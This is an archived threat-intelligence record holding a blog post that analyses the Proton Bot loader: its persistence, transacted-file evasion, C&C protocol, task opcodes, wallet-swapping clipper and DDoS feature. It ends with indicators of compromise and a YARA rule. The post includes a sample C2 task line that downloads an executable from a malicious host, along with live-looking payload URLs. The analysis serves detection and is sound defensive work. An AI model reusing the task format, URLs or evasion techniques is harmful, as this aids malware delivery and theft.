{
	"id": "22619806-52d6-4f00-98ca-cafd5d39761b",
	"created_at": "2026-04-06T00:06:06.487977Z",
	"updated_at": "2026-04-10T03:21:50.729937Z",
	"deleted_at": null,
	"sha1_hash": "6475bd37bc0317c1109b818d46ecddb6d08f8c93",
	"title": "Overview of Proton Bot, another loader in the wild!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 827473,
	"plain_text": "Overview of Proton Bot, another loader in the wild!\r\nPublished: 2019-05-24 · Archived: 2026-04-05 15:49:46 UTC\r\nLoaders nowadays are part of the malware landscape and it is common to see on sandbox logs results with\r\n“loader” tagged on. Specialized loader malware like Smoke or Hancitor/Chanitor are facing more and more with\r\nnew alternatives like Godzilla loader, stealers, miners and plenty other kinds of malware with this developed\r\nfeature as an option. This is easily catchable and already explained in earlier articles that I have made.\r\nSince a few months, another dedicated loader malware appears from multiple sources with the name of “Proton\r\nBot” and on my side, first results were coming from a v0.30 version. For this article, the overview will focus on\r\nthe latest one, the v1.\r\nSold 50$ (with C\u0026C panel) and developed in C++, its cheaper than Smoke (usually seen with an average of\r\n200$/300$) and could explain that some actors/customers are making some changes and trying new products to\r\nsee if it’s worth to continue with it. The developer behind (glad0ff), is not as his first malware, he is also behind\r\nAcrux \u0026 Decrux.\r\n[Disclamer: This article is not a deep in-depth analysis]\r\nAnalyzed sample\r\n1AF50F81E46C8E8D49C44CB2765DD71A [Packed]\r\n4C422E9D3331BD3F1BB785A1A4035BBD [Unpacked]\r\nSomething that I am finally glad by reversing this malware is that I’m not in pain for unpacking a VM protected\r\nsample. By far this is the “only one” that I’ve analyzed from this developer this is not using Themida, VMprotect\r\nor Enigma Protector.\r\nSo seeing finally a clean PE is some kind of heaven.\r\nBehavior\r\nWhen the malware is launched, it’s retrieving the full path of the executed module by calling GetModuleFilename,\r\nthis returned value is the key for Proton Bot to verify if this, is a first-time interaction on the victim machine or in\r\ncontrary an already setup and configured bot. The path is compared with a corresponding name \u0026 repository\r\nhardcoded into the code that are obviously obfuscated and encrypted.\r\nThis call is an alternative to GetCommandLine on this case.\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 1 of 15\n\nOn this screenshot above, EDI contains the value of the payload executed at the current time and EAX, the final\r\nlocation. At that point with a lack of samples in my possession, I cannot confirm this path is unique for all Proton\r\nBot v1 or multiple fields could be a possibility, this will be resolved when more samples will be available for\r\nanalysis…\r\nNext, no matter the scenario, the loader is forcing the persistence with a scheduled task trick. Multiple obfuscated\r\nblocs are following a scheme to generating the request until it’s finally achieved and executed with a simple\r\nShellExecuteA call.\r\nWith a persistence finally integrated, now the comparison between values that I showed on registers will diverge\r\ninto two directions :\r\nIf paths are different\r\n1. Making an HTTP Request on “http://iplogger.org/1i237a\u0026#8221; for grabbing the Bot IP\r\n2. Creating a folder \u0026 copying the payload with an unusual way that I will explain later.\r\n3. Executing proton bot again in the correct folder with CreateProcessA\r\n4. Exiting the current module\r\nif paths are identical\r\n1. two threads are created for specific purposes\r\n1. one for the loader\r\n2. the other for the clipper\r\n2. At that point, all interactions between the bot and the C\u0026C will always be starting with this format :\r\n/page.php?id=%GUID%\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 2 of 15\n\n%GUID% is, in fact, the Machine GUID, so on a real scenario, this could be in an example this value “fdff340f-c526-4b55-b1d1-60732104b942”.\r\nSummary\r\nMutex\r\ndsks102d8h911s29\r\nLoader Path\r\n%APPDATA%/NvidiaAdapter\r\nLoader Folder\r\nSchedule Task\r\nProcess\r\nA unique way to perform data interaction\r\nThis loader has an odd and unorthodox way to manipulate the data access and storage by using the Windows KTM\r\nlibrary. This is way more different than most of the malware that is usually using easier ways for performing tasks\r\nlike creating a folder or a file by the help of the FileAPI module.\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 3 of 15\n\nThe idea here, it is permitting a way to perform actions on data with the guarantee that there is not even a single\r\nerror during the operation. For this level of reliability and integrity, the Kernel Transaction Manager (KTM) comes\r\ninto play with the help of the Transaction NTFS (TxF).\r\nFor those who aren’t familiar with this, there is an example here :\r\n1. CreateTransaction is called for starting the transaction process\r\n2. The requested task is now called\r\n3. If everything is good, the Transaction is finalized with a commit (CommitTransaction) and confirming the\r\noperation is a success\r\n4. If a single thing failed (even 1 among 10000 tasks), the transaction is rolled back with RollbackTransaction\r\nIn the end, this is the task list used by ProtonBot are:\r\nDeleteFileTransactedA\r\nCopyFileTransactedA\r\nSetFileAttributesTransactedA\r\nCreateDirectoryTransactedA\r\nThis different way to interact with the Operating System is a nice way to escape some API monitoring or avoiding\r\ntriggers from sandboxes \u0026 specialized software. It’s a matter time now to hotfix and adjusts this behavior for\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 4 of 15\n\nhaving better results.\r\nThe API used has been also used for another technique with analysis of the banking\r\nmalware Osiris by @hasherezade\r\nAnti-Analysis\r\nThere are three main things exploited here:\r\nStack String\r\nXor encryption\r\nXor key adjusted with a NOT operand\r\nBy guessing right here, with the utilization of stack strings, the main ideas are just to create some obfuscation into\r\nthe code, generating a huge amount of blocks during disassembling/debugging to slow down the analysis. This is\r\nsomewhat, the same kind of behavior that Predator the thief is abusing above v3 version.\r\nThe screenshot as above is an example among others in this malware about techniques presented and there is\r\nnothing new to explain in depth right here, these have been mentioned multiple times and I would say with humor\r\nthat C++ itself is some kind of Anti-Analysis, that is enough to take some aspirin.\r\nLoader Architecture\r\nThe loader is divided into 5 main sections :\r\n1. Performing C\u0026C request for adding the Bot or asking a task.\r\n2. Receiving results from C\u0026C\r\n3. Analyzing OpCode and executing to the corresponding task\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 5 of 15\n\n4. Sending a request to the C\u0026C to indicate that the task has been accomplished\r\n5. Repeat the process [GOTO 1]\r\nC\u0026C requests\r\nFormer loader request\r\nPath base\r\n/page.php\r\nRequired arguments\r\nArgument Meaning API Call / Miscellaneous\r\nid Bot ID RegQueryValueExA – MachineGUID\r\nos Operating System RegQueryValueExA – ProductName\r\npv Account Privilege Hardcoded string – “Admin”\r\na Antivirus Hardcoded string – “Not Supported”\r\ncp CPU Cpuid (Very similar code)\r\ngp GPU EnumDisplayDevicesA\r\nip IP GetModuleFileName (Yup, it’s weird)\r\nname Username RegQueryValueExA – RegisteredOwner\r\nver Loader version Hardcoded string – “1.0 Release”\r\nlr ??? Hardcoded string – “Coming Soon”\r\nAdditional fields when a task is completed\r\nArgument Meaning API Call / Miscellaneous\r\nop OpCode Integer\r\ntd Task ID Integer\r\nTask format\r\nThe task format is really simple and is presented as a simple structure like this.\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 6 of 15\n\nTask Name;Task ID;Opcode;Value\r\nTasks OpCodes\r\nWhen receiving the task, the OpCode is an integer value that permits to reach the specified task. At that time I\r\nhave count 12 possible features behind the OpCode, some of them are almost identical and just a small tweak\r\npermits to differentiate them.\r\nOpCode Feature\r\n1 Loader\r\n2 Self-Destruct\r\n3 Self-Renewal\r\n4 Execute Batch script\r\n5 Execute VB script\r\n6 Execute HTML code\r\n7 Execute Powershell script\r\n8 Download \u0026 Save new wallpaper\r\n9 ???\r\n10 ???\r\n11 ???\r\n12 (Supposed) DDoS\r\nFor those who want to see how the loader part looks like on a disassembler, it’s quite pleasant (sarcastic)\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 7 of 15\n\nthe joy of C++\r\nLoader main task\r\nThe loader task is set to the OpCode 1. in real scenario this could remain at this one :\r\nnewtask;112;1;http://187.ip-54-36-162.eu/uploads/me0zam1czo.exe\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 8 of 15\n\nThis is simplest but accurate to do the task\r\n1. Setup the downloaded directory on %TEMP% with GetTempPathA\r\n2. Remove footprints from cache DeleteUrlCacheEntryA\r\n3. Download the payload – URLDownloadToFileA\r\n4. Set Attributes to the file by using transactions\r\n5. Execute the Payload – ShellExecuteA\r\nOther features\r\nClipper\r\nClipper fundamentals are always the same and at that point now, I’m mostly interested in how the developer\r\ndecided to organize this task. On this case, this is simplest but enough to performs accurately some stuff.\r\nThe first main thing to report about it, it that the wallets and respective regular expressions for detecting them are\r\nnot hardcoded into the source code and needs to perform an HTTP request only once on the C\u0026C for setting-up\r\nthis :\r\n/page.php?id=%GUID%\u0026clip=get\r\nThe response is a consolidated list of a homemade structure that contains the configuration decided by the\r\nattacker. The format is represented like this:\r\n[\r\n id, # ID on C\u0026C\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 9 of 15\n\nname, # ID Name (i.e: Bitcoin)\r\n regex, # Regular Expression for catching the Wallet\r\n attackerWallet # Switching victim wallet with this one\r\n]\r\nAt first, I thought, there is a request to the C\u0026C when the clipper triggered a matched regular expression, but it’s\r\nnot the case here.\r\nOn this case, the attacker has decided to target some wallets:\r\nBitcoin\r\nDash\r\nLitecoin\r\nZcash\r\nEthereum\r\nDogeCoin\r\nif you want an in-depth analysis of a clipper task, I recommend you to check my other articles that mentioned in\r\ndetails this (Megumin \u0026 Qulab).\r\nDDos\r\nProton has an implemented layer 4 DDoS Attack, by performing spreading the server TCP sockets requests with a\r\nspecified port using WinSocks\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 10 of 15\n\nExecuting scripts\r\nThe loader is also configured to launch scripts, this technique is usually spotted and shared by researchers on\r\nTwitter with a bunch of raw Pastebin links downloaded and adjusted to be able to work.\r\n1. Deobfuscating the selected format (.bat on this case)\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 11 of 15\n\n2. Download the script on %TEMP%\r\n3. Change type of the downloaded script\r\n4. Execute the script with ShellExecuteA\r\nAvailable formats are .bat, .vbs, .ps1, .html\r\nWallpaper\r\nThere is a possibility to change the wallpaper of bot, by sending the OpCode 8 with an indicated following image\r\nto download. The scenario remains the same from the loader main task, with the exception of a different API call\r\nat the end\r\n1. Setup the downloaded directory on %TEMP% with GetTempPathA\r\n2. Remove footprints from cache DeleteUrlCacheEntryA\r\n3. Download the image – URLDownloadToFileA\r\n4. Change the wallpaper with SystemParametersInfosA\r\nOn this case the structure will be like this :\r\nBOOL SystemParametersInfoA (\r\n UINT uiAction -\u003e 0x0014 (SPI_SETDESKWALLPAPER)\r\n UINT uiParam -\u003e 0\r\n PVOID pvParam -\u003e %ImagePath%\r\n UINT fWinIni -\u003e 1\r\n);\r\nI can’t understand clearly the utility on my side but surely has been developed for a reason. Maybe in the future, I\r\nwill have the explanation or if you have an idea, let me share your thought about it 🙂\r\nExample in the wild\r\nA few days ago, a ProtonBot C\u0026C (187.ip-54-36-162.eu) was quite noisy to spread malware with a list of\r\ncompatibilized 5000 bots. It’s enough to suggest that it is used by some business already started with this one.\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 12 of 15\n\nNotable malware hosted and/or pushed by this Proton Bot\r\nQulab\r\nProtonBot 🙂\r\nCoinMiners\r\nC# RATs\r\nThere is also another thing to notice, is that the domain itself was also hosting other payloads not linked to the\r\nloader directly and one sample was also spotted on another domain \u0026 loader service (Prostoloader). It’s common\r\nnowadays to see threat actors paying multiple services, to spread their payloads for maximizing profits.\r\nAll of them are accessible on the malware tracker.\r\n[*] Yellow means duplicate hashes in the database.\r\nIoC\r\nProton Bot\r\n187.ip-54-36-162.eu/cmdd.exe\r\n9af4eaa0142de8951b232b790f6b8a824103ec68de703b3616c3789d70a5616f\r\nPayloads from Proton Bot C2\r\nUrls\r\n187.ip-54-36-162.eu/uploads/0et5opyrs1.exe\r\n187.ip-54-36-162.eu/uploads/878gzwvyd6.exe\r\n187.ip-54-36-162.eu/uploads/8yxt7fd01z.exe\r\n187.ip-54-36-162.eu/uploads/9xj0yw51k5.exe\r\n187.ip-54-36-162.eu/uploads/lc9rsy6kjj.exe\r\n187.ip-54-36-162.eu/uploads/m3gc4bkhag.exe\r\n187.ip-54-36-162.eu/uploads/me0zam1czo.exe\r\n187.ip-54-36-162.eu/uploads/Project1.exe\r\n187.ip-54-36-162.eu/uploads/qisny26ct9.exe\r\n187.ip-54-36-162.eu/uploads/r5qixa9mab.exe\r\n187.ip-54-36-162.eu/uploads/rov08vxcqg.exe\r\n187.ip-54-36-162.eu/uploads/ud1lhw2cof.exe\r\n187.ip-54-36-162.eu/uploads/v6z98xkf8w.exe\r\n187.ip-54-36-162.eu/uploads/vww6bixc3p.exe\r\n187.ip-54-36-162.eu/uploads/w1qpe0tkat.exe\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 13 of 15\n\nHashes\r\n349c036cbe5b965dd6ec94ab2c31a3572ec031eba5ea9b52de3d229abc8cf0d1\r\n42c25d523e4402f7c188222faba134c5eea255e666ecf904559be399a9a9830e\r\n5de740006b3f3afc907161930a17c25eb7620df54cff55f8d1ade97f1e4cb8f9\r\n6a51154c6b38f5d1d5dd729d0060fa4fe0d37f2999cb3c4830d45d5ac70b4491\r\n77a35c9de663771eb2aef97eb8ddc3275fa206b5fd9256acd2ade643d8afabab\r\n7d2ccf66e80c45f4a17ef4ac0355f5b40f1d8c2d24cb57a930e3dd5d35bf52b0\r\naeab96a01e02519b5fac0bc3e9e2b1fb3a00314f33518d8c962473938d48c01a\r\nba2b781272f88634ba72262d32ac1b6f953cb14ccc37dc3bfb48dcef76389814\r\nbb68cd1d7a71744d95b0bee1b371f959b84fa25d2139493dc15650f46b62336c\r\nc2a3d13c9cba5e953ac83c6c3fe6fd74018d395be0311493fdd28f3bab2616d9\r\ncbb8e8624c945751736f63fa1118032c47ec4b99a6dd03453db880a0ffd1893f\r\ncd5bffc6c2b84329dbf1d20787b920e5adcf766e98cea16f2d87cd45933be856\r\nd3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf\r\nd3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf\r\ne1d8a09c66496e5b520950a9bd5d3a238c33c2de8089703084fcf4896c4149f0\r\nDomains\r\n187.ip-54-36-162.eu\r\nPDB\r\nE:\\PROTON\\Release\\build.pdb\r\nWallets\r\n3HAQSB4X385HTyYeAPe3BZK9yJsddmDx6A\r\nXbQXtXndTXZkDfb7KD6TcHB59uGCitNSLz\r\nLTwSJ4zE56vZhhFcYvpzmWZRSQBE7oMSUQ\r\nt1bChFvRuKvwxFDkkm6r4xiASBiBBZ24L6h\r\n1Da45bJx1kLL6G6Pud2uRu1RDCRAX3ZmAN\r\n0xf7dd0fc161361363d79a3a450a2844f2a70907c6\r\nD917yfzSoe7j2es8L3iDd3sRRxRtv7NWk8\r\nThreat Actor\r\nGlad0ff (Main)\r\nProtonSellet (Seller)\r\nYara\r\nrule ProtonBot : ProtonBot {\r\nmeta:\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 14 of 15\n\ndescription = “Detecting ProtonBot v1”\r\nauthor = “Fumik0_”\r\ndate = “2019-05-24”\r\nstrings:\r\n$mz = {4D 5A}\r\n$s1 = “proton bot” wide ascii\r\n$s2 = “Build.pdb” wide ascii\r\n$s3 = “ktmw32.dll” wide ascii\r\n$s4 = “json.hpp” wide ascii\r\ncondition:\r\n$mz at 0 and (all of ($s*))\r\n}\r\nConclusion\r\nYoung malware means fresh content and with time and luck, could impact the malware landscape. This loader is\r\ncheap and will probably draw attention to some customers (or even already the case), to have less cost to\r\nmaximize profits during attacks. ProtonBot is not a sophisticated malware but it’s doing its job with extra modules\r\nfor probably being more attractive. Let’s see with the time how this one will evolve, but by seeing some kind of\r\nodd cases with plenty of different malware pushed by this one, that could be a scenario among others that we\r\ncould see in the future.\r\nOn my side, it’s time to chill a little.\r\nSpecial Thanks – S!ri \u0026 Snemes\r\nSource: https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nhttps://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/"
	],
	"report_names": [
		"overview-of-proton-bot-another-loader-in-the-wild"
	],
	"threat_actors": [],
	"ts_created_at": 1775433966,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6475bd37bc0317c1109b818d46ecddb6d08f8c93.pdf",
		"text": "https://archive.orkl.eu/6475bd37bc0317c1109b818d46ecddb6d08f8c93.txt",
		"img": "https://archive.orkl.eu/6475bd37bc0317c1109b818d46ecddb6d08f8c93.jpg"
	}
}